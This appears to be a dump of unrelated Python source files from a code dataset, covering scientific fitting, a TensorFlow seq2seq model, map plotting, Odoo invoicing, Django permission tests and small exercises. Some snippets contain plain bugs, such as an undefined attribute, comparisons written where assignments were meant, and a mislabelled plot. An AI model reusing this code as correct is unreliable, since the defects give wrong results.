fitQP(Qhist,P,N=50,doErr=False,dof=0):\n P['Na'] = 1\n P = collections.OrderedDict(P)\n \n ng = len(P)\n mx = Qhist[1]\n mN = Qhist[0].sum()*(mx[1]-mx[0])\n my = Qhist[0]/mN\n merr = None\n abSig = None\n if doErr:\n args = Qhist[3]\n mx = mx[args]\n my = my[args]\n merr = np.sqrt(Qhist[2][args]/(mN*mN))\n abSig = True\n lambdgpn = lambda q,q0,q1,s0,s1,u,Na: gpn2(q,N,q0,q1,s0,s1,u,Na)\n \n fit,tmp = curve_fit(lambdgpn,mx,my,p0=list(P.values()),bounds=([-np.inf,0,0,0,0,0],np.inf),sigma=merr,absolute_sigma=abSig,maxfev=10000,ftol=1e-8,gtol=1e-8)\n mchi2 = chisquare(my,gpn2(mx,N,*fit),ddof=dof)\n #print(fit)\n params = P.copy()\n params.update(zip(params,fit))\n paramerr = params.copy()\n paramerr.update(zip(paramerr,np.diag(tmp)))\n params['chi2'] = mchi2\n params['norm'] = mN\n return params,paramerr\n \n#Pulse Finding \n#create kernel for Laplacian of Gaussian edge finding filter\ndef LoGkernel(sigma=1,scale=5,norm=False):\n sigma2 = sigma*sigma\n size = int(scale*sigma)\n x = (np.arange(size) - (size-1)/2.0)\n kernel = (x*x/sigma2 - 1)/sigma2\n N = 1/(sigma*np.sqrt(2*np.pi)) if norm else 1\n x2 = N*np.exp(-x*x/(2*sigma2))\n print(x)\n print(kernel)\n LoG = kernel*x2\n return LoG\n\n#filter performed using signal.fftconvolve() which allows convolution along axis, i.e. all filtered wave forms generated in one line utiizing scipy optimizations\n\n#calculate minimum maximum and gradient of sliding window of Filtered Waveform\ndef mmg_rolling(a, window):\n axis =-1\n shape = a.shape[:axis] + (a.shape[axis] - window + 1, window)\n strides = a.strides + (a.strides[-1],)\n rolling = np.lib.stride_tricks.as_strided(a, shape=shape, strides=strides)\n grad = (rolling[...,-1]-rolling[...,0])/float(window-1.0)\n return np.max(rolling,axis=axis),np.min(rolling,axis=axis),grad\n\n#zero crossings of filtered waveform are candidate edges, gradient discriminates rising edge v falling edge candidates\n#-1 elements are rising edge candidates and +1 elements are falling edge candidates\ndef zero_crossing(mLoG,mWave,thresh,window=3):\n maxL,minL,gradL = mmg_rolling(mLoG,window)\n #print(grad2L,gradL)\n pzero = (mLoG[...,1:-1]>0)\n zeroCross = np.zeros(shape=mLoG.shape).astype(np.int)\n zeroCross[...,1:-1] = pzero*(minL<0) + (1-pzero)*(maxL>0)\n diffL = maxL-minL\n zeroCross[...,1:-1] = zeroCross[...,1:-1]*(diffL > thresh)\n zeroCross[...,1:-1] = ((gradL>thresh/window).astype(np.int)-(gradL<-thresh/window).astype(np.int))*zeroCross[...,1:-1]\n \n #zeroCross[zeroCross==0] = np.nan\n lEd = awk.fromiter([np.nonzero(zi)[0] for zi in zeroCross<0])\n rEd = awk.fromiter([np.nonzero(zi)[0] for zi in zeroCross>0])\n return (lEd,rEd),np.pad(gradL,[(0,)]*(gradL.ndim-1)+[(1,)],'constant',constant_values=(0))\n\n\n#Now sort through candidate edges\n#Maybe integrate from every left edge to every right edge (one sided search)\n#Find minima between left right edge pairs\n#Set a min threshold for the integral\n#All edge combinations with integral above threshold kept\n#Sort kept ranges by size\n#Starting from smallest range integrate beyond boundary (both sides) until fractional change in integral is <1% (set as new left and right edge)\n#Now look for overlapping pulses and merge","sub_path":"AnaUtils.py","file_name":"AnaUtils.py","file_ext":"py","file_size_in_byte":9806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"9730933","text":"import random\n\nimport numpy as np\nimport tensorflow as tf\nimport sys\n\nnp.random.seed(1000)\n\nclass Seq2SeqModel(object):\n def __init__(self, encoder_size, decoder_size, hidden_dim, input_dim, output_dim):\n self.encoder_size = encoder_size\n self.decoder_size = decoder_size\n self.hidden_dim = hidden_dim\n self.input_dim = input_dim\n self.output_dim = output_dim\n\n self.encoder_inputs = []\n for i in range(encoder_size):\n self.encoder_inputs.append(tf.placeholder(tf.float32, shape=[None, input_dim], name=\"encoder{0}\".format(i)))\n self.decoder_inputs = []\n for i in range(decoder_size):\n self.decoder_inputs.append(\n tf.placeholder(tf.float32, shape=[None, output_dim], name=\"decoder{0}\".format(i)))\n\n encoder_cell = tf.contrib.rnn.GRUCell(hidden_dim)\n encoder_cell = tf.contrib.rnn.DropoutWrapper(encoder_cell, output_keep_prob=0.5)\n encoder_outputs, state = tf.contrib.rnn.static_rnn(encoder_cell, self.encoder_inputs, dtype=tf.float32)\n # construct gru basic cell\n decoder_cell = tf.contrib.rnn.GRUCell(hidden_dim)\n W = tf.Variable(tf.truncated_normal([hidden_dim, output_dim]))\n b = tf.Variable(tf.truncated_normal([output_dim]))\n\n self.decoder_outputs = []\n with tf.variable_scope(\"rnn_decoder\"):\n for i, inp in enumerate(self.decoder_inputs):\n if i == 0:\n prev = self.encoder_inputs[-1]\n if i > 0:\n tf.get_variable_scope().reuse_variables()\n decoder_output, state = decoder_cell(prev, state)\n prev = tf.matmul(decoder_output, W) + b\n self.decoder_outputs.append(prev)\n\n self.loss = 0.0\n for i in range(len(self.decoder_inputs)):\n self.loss += tf.sqrt(tf.reduce_sum(tf.square(self.decoder_inputs[i] - self.decoder_outputs[i])))\n\n self.optimizer = tf.train.AdamOptimizer(0.001).minimize(self.loss)\n self.saver = tf.train.Saver(tf.global_variables())\n \n def step(self, sess, X, y, encoder_size, decoder_size, is_training):\n input_feed = {}\n for i in range(encoder_size):\n input_feed[self.mlp_inputs[i].name] = X[i]\n for i in range(decoder_size):\n input_feed[self.decoder_inputs[i].name] = y[i]\n # train\n if is_training:\n output_feed = [self.loss, self.decoder_outputs, self.optimizer]\n outputs = sess.run(output_feed, input_feed)\n # test\n else:\n output_feed = [self.loss, self.decoder_outputs]\n outputs = sess.run(output_feed, input_feed)\n return outputs[0], outputs[1]\n\n def get_batch(self, X, y, batch_size, step):\n if step == len(X) / batch_size - 1:\n batch_encode_inputs = X[len(X) - batch_size:]\n batch_decode_inputs = y[len(y) - batch_size:]\n else:\n batch_encode_inputs = X[step*batch_size : (step+1)*batch_size]\n batch_decode_inputs = y[step*batch_size : (step+1)*batch_size]\n batch_encode_inputs = np.transpose(batch_encode_inputs, (1, 0, 2))\n batch_decode_inputs = np.transpose(batch_decode_inputs, (1, 0, 2))\n return batch_encode_inputs, batch_decode_inputs","sub_path":"code/TrajectoryPrediction-master/GRU/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"604315206","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 29 15:38:12 2017\n\n@author: stangen\n\"\"\"\n\n#Get the required packages\nfrom netCDF4 import Dataset\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.basemap import Basemap\n\n#Import the ncfile, assign a file handle, indicate read-only\nmy_example_nc_file = '/home/disk/hot/stangen/Documents/GEFS/netcdf/pgbf_2017081400_00.nc'\nfh = Dataset(my_example_nc_file, mode='r')\n#Print the variables to see what we have available\nprint(fh.variables)\n\n#Get lat,lon, 500mb height\nlons = fh.variables['longitude'][:]\nlats = fh.variables['latitude'][:]\nZ500 = fh.variables['HGT_500mb'][:]\nZ5002 = fh.variables['HGT_500mb'][0,:,:]\n\ntime = fh.variables['time'][:]\n\nZ500_units = fh.variables['HGT_500mb'].units\n\nfh.close()\n\n\n#print(Z500_00Z)\n\nZ500m = np.mean(Z500)\n\n#Get some parameters for the Stereographic Projection\nlon_0 = lons.mean()\nlat_0 = lats.mean()\n\n\nm = Basemap(projection='merc',llcrnrlat=-80,urcrnrlat=80,\\\n llcrnrlon=0,urcrnrlon=360,lat_ts=20,resolution='c')\n\n# Because our lon and lat variables are 1D, \n# use meshgrid to create 2D arrays \n# Not necessary if coordinates are already in 2D arrays.\nlon, lat = np.meshgrid(lons, lats)\nxi, yi = m(lon, lat)\n\n# Plot Data\ncs = m.pcolor(xi, yi, Z5002)\n#cs = m.contour(xi, yi, Z5002,15,linewidths=1.5)\n\n# Add Grid Lines\nm.drawparallels(np.arange(-80., 81., 10.), labels=[1,0,0,0], fontsize=10)\nm.drawmeridians(np.arange(0., 361., 10.), labels=[0,0,0,1], fontsize=10)\n\n# Add Coastlines, States, and Country Boundaries\nm.drawcoastlines()\nm.drawstates()\nm.drawcountries()\n\n# Add Colorbar\ncbar = m.colorbar(cs, location='bottom', pad=\"10%\")\ncbar.set_label(Z500_units)\n\n# Add Title\nplt.title('DJF Maximum Temperature')\n\nplt.show()","sub_path":"EFA/plotting/plotting_practice.py","file_name":"plotting_practice.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"544362284","text":"# -*- coding: utf-8 -*-\n##############################################################################\n# For copyright and license notices, see __openerp__.py file in module root\n# directory\n##############################################################################\n\nfrom dateutil.relativedelta import relativedelta\nimport datetime\nimport logging\nimport time\n\nfrom openerp.osv import osv, fields\nimport openerp.tools\nfrom openerp.tools.translate import _\nfrom openerp import models, api\nfrom openerp.addons.decimal_precision import decimal_precision as dp\n\n\nclass account_analytic_account(osv.osv):\n _inherit = \"account.analytic.account\"\n\n def _prepare_invoice_data(self, cr, uid, contract, context=None):\n context = context or {}\n\n journal_obj = self.pool.get('account.journal')\n if contract.type == 'purchase_contract':\n invoice = {}\n if not contract.partner_id:\n raise osv.except_osv(_('No Supplier Defined!'), _(\n \"You must first select a Supplier for Contract %s!\") % contract.name)\n\n fpos = contract.partner_id.property_account_position or False\n journal_ids = journal_obj.search(cr, uid, [(\n 'type', '=', 'purchase'), ('company_id', '=', contract.company_id.id or False)], limit=1)\n if not journal_ids:\n raise osv.except_osv(_('Error!'),\n _('Please define a pruchase journal for the company \"%s\".') % (contract.company_id.name or '', ))\n\n currency_id = False\n if contract.pricelist_id:\n currency_id = contract.pricelist_id.currency_id.id\n elif contract.partner_id.property_product_pricelist:\n currency_id = contract.partner_id.property_product_pricelist.currency_id.id\n elif contract.company_id:\n currency_id = contract.company_id.currency_id.id\n\n invoice = {\n 'account_id': contract.partner_id.property_account_payable.id,\n 'type': 'in_invoice',\n 'reference': contract.name,\n 'partner_id': contract.partner_id.id,\n 'currency_id': currency_id,\n 'journal_id': len(journal_ids) and journal_ids[0] or False,\n 'date_invoice': contract.recurring_next_date,\n 'origin': contract.code,\n 'fiscal_position': fpos and fpos.id,\n 'company_id': contract.company_id.id or False,\n }\n return invoice\n else:\n return super(account_analytic_account, self)._prepare_invoice_data(cr, uid, contract, context=context)\n\n def _prepare_invoice_lines(self, cr, uid, contract, fiscal_position_id, context=None):\n\n if not context:\n context = {}\n if contract.type == 'purchase_contract':\n fpos_obj = self.pool.get('account.fiscal.position')\n fiscal_position = None\n if fiscal_position_id:\n fiscal_position = fpos_obj.browse(\n cr, uid, fiscal_position_id, context=context)\n invoice_lines = []\n for line in contract.recurring_invoice_line_ids:\n\n res = line.product_id\n account_id = res.property_account_expense.id\n if not account_id:\n account_id = res.categ_id.property_account_expense_categ.id\n account_id = fpos_obj.map_account(\n cr, uid, fiscal_position, account_id)\n\n taxes = res.supplier_taxes_id or False\n if taxes:\n tax_ids = [x.id for x in taxes]\n tax_ids = self.pool['account.tax'].search(\n cr, uid,\n [('id', 'in', tax_ids),\n ('company_id', '=', contract.company_id.id)],\n context=context)\n taxes = self.pool['account.tax'].browse(\n cr, uid, tax_ids, context=context)\n tax_id = fpos_obj.map_tax(cr, uid, fiscal_position, taxes)\n\n invoice_lines.append((0, 0, {\n 'name': line.name,\n 'account_id': account_id,\n 'account_analytic_id': contract.id,\n 'price_unit': line.price_unit or 0.0,\n 'quantity': line.quantity,\n 'uos_id': line.uom_id.id or False,\n 'product_id': line.product_id.id or False,\n 'invoice_line_tax_id': [(6, 0, tax_id)],\n }))\n return invoice_lines\n else:\n return super(account_analytic_account, self)._prepare_invoice_lines(cr, uid, contract, fiscal_position_id, context=None)\n\n def _cron_recurring_create_invoice_purchase(self, cr, uid, context=None):\n current_date = time.strftime('%Y-%m-%d')\n contract_ids = self.search(cr, uid, [('recurring_next_date', '<=', current_date), (\n 'state', '=', 'open'), ('recurring_invoices', '=', True), ('type', '=', 'purchase_contract')])\n return self._recurring_create_invoice(cr, uid, contract_ids, context=context)\n\n\nclass AccountAnalyticInvoiceLine(models.Model):\n _inherit = \"account.analytic.invoice.line\"\n\n @api.multi\n def product_id_change(\n self, product, uom_id, qty=0, name='', partner_id=False,\n price_unit=False, pricelist_id=False, company_id=None):\n context = self._context or {}\n company_id = company_id or False\n local_context = dict(context, company_id=company_id,\n force_company=company_id, pricelist=pricelist_id)\n result = super(AccountAnalyticInvoiceLine, self).product_id_change(\n product=product, uom_id=uom_id, qty=0, name='',\n partner_id=False, price_unit=False, pricelist_id=False,\n company_id=None)\n\n if not product or not context.get('purchase', False):\n return result\n res = self.env['product.product'].with_context(local_context).browse(\n product)\n if pricelist_id:\n price = res.price\n else:\n price = res.standard_price\n result['value']['price_unit'] = price\n if result['value']['uom_id'] != res.uom_id.id:\n new_price = self.env['product.uom']._compute_price(\n res.uom_id.id,\n result['value']['price_unit'],\n result['value']['uom_id'])\n result['value']['price_unit'] = new_price\n return result\n","sub_path":"account_analytic_purchase_contract/account_analytic_analysis.py","file_name":"account_analytic_analysis.py","file_ext":"py","file_size_in_byte":6592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"458384479","text":"'''\nCreated on Jun 8, 2010\n\nContains views for permissions tests\n\n@author: jnaous\n'''\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.views.generic import create_update\nfrom django.core.urlresolvers import reverse\nfrom django.shortcuts import get_object_or_404\nfrom expedient.common.permissions.utils import get_queryset_from_class\nfrom expedient.common.permissions.utils import get_user_from_req, get_queryset\nfrom expedient.common.permissions.shortcuts import give_permission_to\nfrom expedient.common.permissions.decorators import require_objs_permissions_for_view\nfrom models import PermissionTestClass\n\n@require_objs_permissions_for_view(\n [\"can_get_x2\", \"can_read_val\"],\n get_user_from_req,\n get_queryset(PermissionTestClass, \"obj_id\"),\n)\ndef test_view_x2(request, obj_id=None):\n obj = get_object_or_404(PermissionTestClass, pk=obj_id)\n return HttpResponse(\"%s\" % obj.get_val_x2())\n\n@require_objs_permissions_for_view(\n [\"can_add\"],\n get_user_from_req,\n get_queryset_from_class(PermissionTestClass),\n [\"POST\"],\n)\ndef test_view_create(request):\n return create_update.create_object(\n request, PermissionTestClass,\n template_name=\"permissions/empty.html\",\n post_save_redirect=reverse(\"test_view_crud\"),\n )\n\ndef test_protected_url(request):\n return HttpResponse(\"Worked\")\n\n@require_objs_permissions_for_view(\n [\"can_set_val\"],\n get_user_from_req,\n get_queryset(PermissionTestClass, 'obj_id'),\n [\"POST\"],\n)\n@require_objs_permissions_for_view(\n [\"can_read_val\"],\n get_user_from_req,\n get_queryset(PermissionTestClass, 'obj_id'),\n [\"GET\"],\n)\ndef test_view_update(request, obj_id=None):\n return create_update.update_object(\n request, PermissionTestClass,\n object_id=obj_id,\n template_name=\"permissions/empty.html\",\n post_save_redirect=reverse(\"test_view_update\",\n kwargs=dict(obj_id=obj_id)),\n )\n\ndef add_perms_view(request, permission, user, target, redirect_to=None):\n if request.method == \"POST\":\n give_permission_to(permission, target, user)\n redirect_to = redirect_to or reverse(\"test_view_crud\")\n return HttpResponseRedirect(redirect_to)\n else:\n return HttpResponse(\n\"\"\"\nDo you want to get permissions to create PermissionTestClass instances?\n
    \n\n\n
    \n\"\"\" % reverse(\"test_view_crud\"))\n\ndef other_perms_view(request, permission, user, target, redirect_to=None):\n if request.method == \"POST\":\n give_permission_to(permission, target, user)\n redirect_to = redirect_to or reverse(\"test_view_crud\")\n return HttpResponseRedirect(redirect_to)\n else:\n return HttpResponse(\n\"\"\"\nDo you want to get %s permission for obj %s?\n
    \n\n\n
    \n\"\"\" % (permission.name, target, reverse(\"test_view_crud\")))\n","sub_path":"expedient/src/python/expedient/common/permissions/tests/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"121292447","text":"# --------------------------------------------------------\n# redefine the number of training and test set\n# training set < 89916, test set < 9913\n# Written by Mang Ning\n# --------------------------------------------------------\n\n\nimport argparse\n\n\ndef main():\n # choose the numbet of training images and test images\n parser = argparse.ArgumentParser(description='Train a Fast R-CNN network')\n parser.add_argument('--train', dest='train',\n help='number of training images',\n default='19695', type=int) # 3 senarios (boardgame, diy, drink)\n parser.add_argument('--test', dest='test',\n help='number of test images',\n default='1666', type=int) # 3 senarios (boardgame, diy, drink)\n args = parser.parse_args()\n num_training = args.train\n num_test = args.test\n\n with open('pascal_voc_format/VOCdevkit2007_handobj_100K/VOC2007/ImageSets/Main/trainval.txt', 'r') as r:\n lines=r.readlines()\n\n with open('pascal_voc_format/VOCdevkit2007_handobj_100K/VOC2007/ImageSets/Main/trainval_cp.txt', 'w') as w:\n for ind, l in enumerate(lines):\n w.write(l)\n if ind == (num_training-1):\n break\n\n\n with open('pascal_voc_format/VOCdevkit2007_handobj_100K/VOC2007/ImageSets/Main/test.txt', 'r') as r:\n lines=r.readlines()\n\n with open('pascal_voc_format/VOCdevkit2007_handobj_100K/VOC2007/ImageSets/Main/test_cp.txt', 'w') as w:\n for ind, l in enumerate(lines):\n w.write(l)\n if ind == (num_test-1):\n break\n\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"data/Redefine_num_trainingtest_imgs.py","file_name":"Redefine_num_trainingtest_imgs.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"380479390","text":"\"\"\"\nGiven two arrays, write a function to compute their intersection.\n\nExample 1:\n Input: nums1 = [1,2,2,1], nums2 = [2,2]\n Output: [2,2]\n\nExample 2:\n Input: nums1 = [4,9,5], nums2 = [9,4,9,8,4]\n Output: [4,9]\n\nNote:\n Each element in the result should appear as many times as it shows in both arrays.\n The result can be in any order.\n\nFollow up:\n What if the given array is already sorted? How would you optimize your algorithm?\n What if nums1's size is small compared to nums2's size? Which algorithm is better?\n What if elements of nums2 are stored on disk, and the memory is limited such that you cannot load all elements into the memory at once?\n\"\"\"\n\ndef intersect(nums1, nums2):\n # count and record the freq of the nums in nums1 list\n num_freq_1 = dict()\n for num in nums1:\n if num in num_freq_1:\n num_freq_1[num] += 1\n else:\n num_freq_1[num] = 1\n # count and record the freq of the nums in nums2 list\n num_freq_2 = dict()\n for num in nums2:\n if num in num_freq_2:\n num_freq_2[num] += 1\n else:\n num_freq_2[num] = 1\n # iterate one of the dict, find the num exist in both dict as key\n result = list()\n for num in num_freq_1:\n if num in num_freq_2:\n # find the minimum freq of this num in these two dicts\n if num_freq_2[num] > num_freq_1[num]:\n min = num_freq_1[num]\n else:\n min = num_freq_2[num]\n # append min number of num into the result list\n for i in range(0, min):\n result.append(num)\n return result\n\nnums1 = [1,2,2,1]\nnums2 = [2,2]\n\nnums3 = [4,9,5]\nnums4 = [9,4,9,8,4]\nprint(intersect(nums3, nums4))\n","sub_path":"LeetCode-Python/350 Intersection of Two Arrays II.py","file_name":"350 Intersection of Two Arrays II.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"425461026","text":"from shutil import move\nfrom support import *\n\n\nclass TestRun(TestCase):\n def test_xzutils_anod(self):\n \"\"\"Run checker against xzutils.anod\n \"\"\"\n p = self.run_style_checker('anod', 'xzutils.anod')\n self.assertEqual(p.status, 0, p.image)\n self.assertRunOutputEmpty(p)\n\n def test_xzutils_ko_pep8_anod(self):\n \"\"\"Run checker against xzutils-ko-pep8.anod\n \"\"\"\n p = self.run_style_checker('anod', 'xzutils-ko-pep8.anod')\n self.assertNotEqual(p.status, 0, p.image)\n self.assertRunOutputEqual(p, \"\"\"\\\nxzutils-ko-pep8.anod:3:1: E302 expected 2 blank lines, found 1\n\"\"\")\n\n def test_xzutils_ko_pyflakes_anod(self):\n \"\"\"Run checker against xzutils-ko-pyflakes.anod\n \"\"\"\n p = self.run_style_checker('anod', 'xzutils-ko-pyflakes.anod')\n self.assertNotEqual(p.status, 0, p.image)\n self.assertRunOutputEqual(p, \"\"\"\\\nxzutils-ko-pyflakes.anod:1: undefined name 'spec'\n\"\"\")\n\n\nif __name__ == '__main__':\n runtests()\n","sub_path":"testsuite/tests/Q606-055__Anod/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"227744563","text":"# Decision Tree Program - Census Data\n\n#Age: \n#0-29: 1 30+: 2\n\nageInput=int(input(\"Please enter age: \"))\nif ageInput<30:\n\tage=\"1\"\nelse:\n\tage=\"2\"\n\n# Marital Status\n# Options: divorced, married, never married, Separated, Widowed\nMS = input(\"Enter marital status: \")\nif (MS!=\"divorced\")and(MS!=\"married\"):\n\tMS=\"other\"\n\n# Education\n# Inputs: No HS, HS, Associate, Bachelor, Masters, Prof, Doctorate\ned=input(\"Enter education level: \")\n\n# Hours worked per week\n# 0-40: standard 41+: extra\nhoursInput=int(input(\"enter number of hours worked per week: \"))\nif hoursInput>40:\n\thours=\"extra\"\nelse:\n\thours=\"standard\"\n\t\n# Occupation: transport, tech, unknown, clerical, craft, armed forces\nOccInput=input(\"enter occupation: \")\nif (OccInput==\"tech\" or OccInput==\"unknown\"):\n\tocc=\"2\"\nelif (OccInput==\"clerical\" or OccInput==\"craft\" or OccInput==\"armed forces\"):\n\tocc=\"1\"\nelse:\n\tocc=\"0\"\n\t\n# Gender: M F\ngender = input(\"enter gender: \")\n\t\n\n# our classification output = income level\t\n# Initialize as unknown in case the tree doesnt cover output\nincome = \"unknown\"\n\t\nif (MS!=\"other\"): # left branch\n\tif (ed!=\"HS\" or ed!=\"no HS\"):\n\t\tif MS==\"married\":\n\t\t\tif hours==\"extra\": # applies to all branches\n\t\t\t\tincome=\"greater\"\n\t\t\telse:\n\t\t\t\tif age == \"2\":\n\t\t\t\t\tif occ == \"2\":\n\t\t\t\t\t\tincome=\"less\"\n\t\t\t\t\telse:\n\t\t\t\t\t\tincome=\"greater\"\n\t\t\t\telse:\n\t\t\t\t\tincome=\"less\"\n\t\tif MS==\"divorced\":\n\t\t\tif hours==\"extra\": #right tree\n\t\t\t\tif (ed==\"Masters\" or ed==\"Prof\" or ed==\"Doctorate\"):\n\t\t\t\t\tif (occ ==\"1\"):\t\n\t\t\t\t\t\tincome=\"greater\"\n\t\t\t\t\telse:\n\t\t\t\t\t\tincome=\"less\"\n\t\t\t\telse:\n\t\t\t\t\tincome=\"less\"\n\telse:\n\t\tincome=\"less\"\nelse: # right branch\t\n\tif (ed==\"HS\" or ed==\"no HS\"):\n\t\tincome=\"less\" #left branch)\n\telse:\n\t\tif age==\"0\":\n\t\t\tincome=\"less\" # left branch\n\t\telse:\n\t\t\tif hours==\"standard\":# right branch here\n\t\t\t\tif (ed==\"Prof\" or ed==\"Doctorate\"):\n\t\t\t\t\tif (gender==\"male\"):\n\t\t\t\t\t\tincome=\"greater\"\n\t\t\t\t\telse:\n\t\t\t\t\t\tincome=\"less\"\n\t\t\t\telse:\n\t\t\t\t\tincome=\"less\"\n\t\t\telse:\n\t\t\t\tif (ed==\"Masters\" or ed==\"Prof\" or ed==\"Doctorate\"):\t##finish\n\t\t\t\t\tif (occ==\"1\"):\n\t\t\t\t\t\tincome==\"greater\"\n\t\t\t\t\telse:\n\t\t\t\t\t\tincome==\"less\"\n\t\t\t\telse:\n\t\t\t\t\tincome=\"less\"\n\t\t\t\t\t\n\t\t\t\t\n\t\n\t\n\t\n#print(str(age))\n#print(MS)\n#print(ed)\n#print(hours)\n#print(income)\n\nprint(\"\\nExpected annual income is \"+income+\" than $50,000\") \n","sub_path":"orginaltree.py","file_name":"orginaltree.py","file_ext":"py","file_size_in_byte":2260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"156417275","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Sep 23 13:05:34 2019\r\n\r\n@author: tadahaya\r\n\"\"\"\r\nimport unittest\r\nimport pandas as pd\r\nimport os\r\nimport sys\r\nimport math\r\n\r\nfrom enan.fet import FET\r\n\r\nclass SampleTest(unittest.TestCase):\r\n CLS_VAL = 'none'\r\n\r\n # called when test class initialization\r\n @classmethod\r\n def setUpClass(cls):\r\n if sys.flags.debug:\r\n print('> setUpClass method is called.')\r\n cls.CLS_VAL = '> setUpClass : initialized!'\r\n if sys.flags.debug:\r\n print(cls.CLS_VAL)\r\n\r\n # called when test class end\r\n @classmethod\r\n def tearDownClass(cls):\r\n if sys.flags.debug:\r\n print('> tearDownClass method is called.')\r\n cls.CLS_VAL = '> tearDownClass : released!'\r\n if sys.flags.debug:\r\n print(cls.CLS_VAL)\r\n\r\n # called when a test method runs\r\n def setUp(self):\r\n if sys.flags.debug:\r\n print(os.linesep + '> setUp method is called.')\r\n self.smpl = FET()\r\n\r\n # called when a test method ends\r\n def tearDown(self):\r\n if sys.flags.debug:\r\n print(os.linesep + '> tearDown method is called.')\r\n\r\n def _df_checker(self,df):\r\n if type(df)!=pd.core.frame.DataFrame:\r\n return False\r\n elif df.shape[0]==0:\r\n return False\r\n else:\r\n head = df.head(1)\r\n judge = math.isnan(head.iat[0,0])\r\n return not judge\r\n\r\n def _sr_checker(self,sr):\r\n if type(sr)!=pd.core.series.Series:\r\n return False\r\n if sr.shape[0]==0:\r\n return False\r\n else:\r\n head = sr.head(1)\r\n judge = math.isnan(head.iat[0])\r\n return not judge\r\n\r\n def test_calc(self):\r\n # prepare test patterns\r\n test_patterns = [\r\n (\"fdr_bh\",\"greater\",None), # (arg1, arg2, ..., expected result)\r\n (\"fdr_bh\",\"two-sided\",None), # (arg1, arg2, ..., expected result)\r\n (\"fdr_bh\",\"less\",None), # (arg1, arg2, ..., expected result)\r\n (\"fdr_bh\",\"greater\",3), # (arg1, arg2, ..., expected result)\r\n ]\r\n\r\n ref,obj = self.smpl.generate_test_data()\r\n self.smpl.fit(ref)\r\n\r\n ### loop for sweeping all conditions\r\n for tcorr,tmode,tfocus in test_patterns:\r\n with self.subTest(correction=tcorr,mode=tmode,focus=tfocus):\r\n self.assertTrue(self._df_checker(self.smpl.calc(data=obj,\r\n correction=tcorr,mode=tmode,focus=tfocus)))\r\n","sub_path":"tests/test_fet.py","file_name":"test_fet.py","file_ext":"py","file_size_in_byte":2555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"169332835","text":"from __future__ import unicode_literals\nimport six\nfrom six.moves.urllib import parse\n\nfrom asgiref.inmemory import ChannelLayer\nfrom twisted.test import proto_helpers\n\nfrom daphne.http_protocol import HTTPFactory\n\n\ndef message_for_request(method, path, params=None, headers=None, body=None):\n \"\"\"\n Constructs a HTTP request according to the given parameters, runs\n that through daphne and returns the emitted channel message.\n \"\"\"\n request = _build_request(method, path, params, headers, body)\n return _run_through_daphne(request, 'http.request')\n\n\ndef _build_request(method, path, params=None, headers=None, body=None):\n \"\"\"\n Takes request parameters and returns a byte string of a valid HTTP/1.1 request.\n\n We really shouldn't manually build a HTTP request, and instead try to capture\n what e.g. urllib or requests would do. But that is non-trivial, so meanwhile\n we hope that our request building doesn't mask any errors.\n\n This code is messy, because urllib behaves rather different between Python 2\n and 3. Readability is further obstructed by the fact that Python 3.4 doesn't\n support % formatting for bytes, so we need to concat everything.\n If we run into more issues with this, the python-future library has a backport\n of Python 3's urllib.\n\n :param method: ASCII string of HTTP method.\n :param path: unicode string of URL path.\n :param params: List of two-tuples of bytestrings, ready for consumption for\n urlencode. Encode to utf8 if necessary.\n :param headers: List of two-tuples ASCII strings of HTTP header, value.\n :param body: ASCII string of request body.\n\n ASCII string is short for a unicode string containing only ASCII characters,\n or a byte string with ASCII encoding.\n \"\"\"\n if headers is None:\n headers = []\n else:\n headers = headers[:]\n\n if six.PY3:\n quoted_path = parse.quote(path)\n if params:\n quoted_path += '?' + parse.urlencode(params)\n quoted_path = quoted_path.encode('ascii')\n else:\n quoted_path = parse.quote(path.encode('utf8'))\n if params:\n quoted_path += b'?' + parse.urlencode(params)\n\n request = method.encode('ascii') + b' ' + quoted_path + b\" HTTP/1.1\\r\\n\"\n for k, v in headers:\n request += k.encode('ascii') + b': ' + v.encode('ascii') + b\"\\r\\n\"\n\n request += b'\\r\\n'\n\n if body:\n request += body.encode('ascii')\n\n return request\n\n\ndef _run_through_daphne(request, channel_name):\n \"\"\"\n Returns Daphne's channel message for a given request.\n\n This helper requires a fair bit of scaffolding and can certainly be improved,\n but it works for now.\n \"\"\"\n channel_layer = ChannelLayer()\n factory = HTTPFactory(channel_layer)\n proto = factory.buildProtocol(('127.0.0.1', 0))\n tr = proto_helpers.StringTransport()\n proto.makeConnection(tr)\n proto.dataReceived(request)\n _, message = channel_layer.receive([channel_name])\n return message\n\n\ndef content_length_header(body):\n \"\"\"\n Returns an appropriate Content-Length HTTP header for a given body.\n \"\"\"\n return 'Content-Length', six.text_type(len(body))\n","sub_path":"daphne/tests/factories.py","file_name":"factories.py","file_ext":"py","file_size_in_byte":3187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"353254042","text":"#!/usr/local/pyenv/shims/python3.6\n# coding: utf-8\n\nimport os\nimport argparse\nfrom watch import 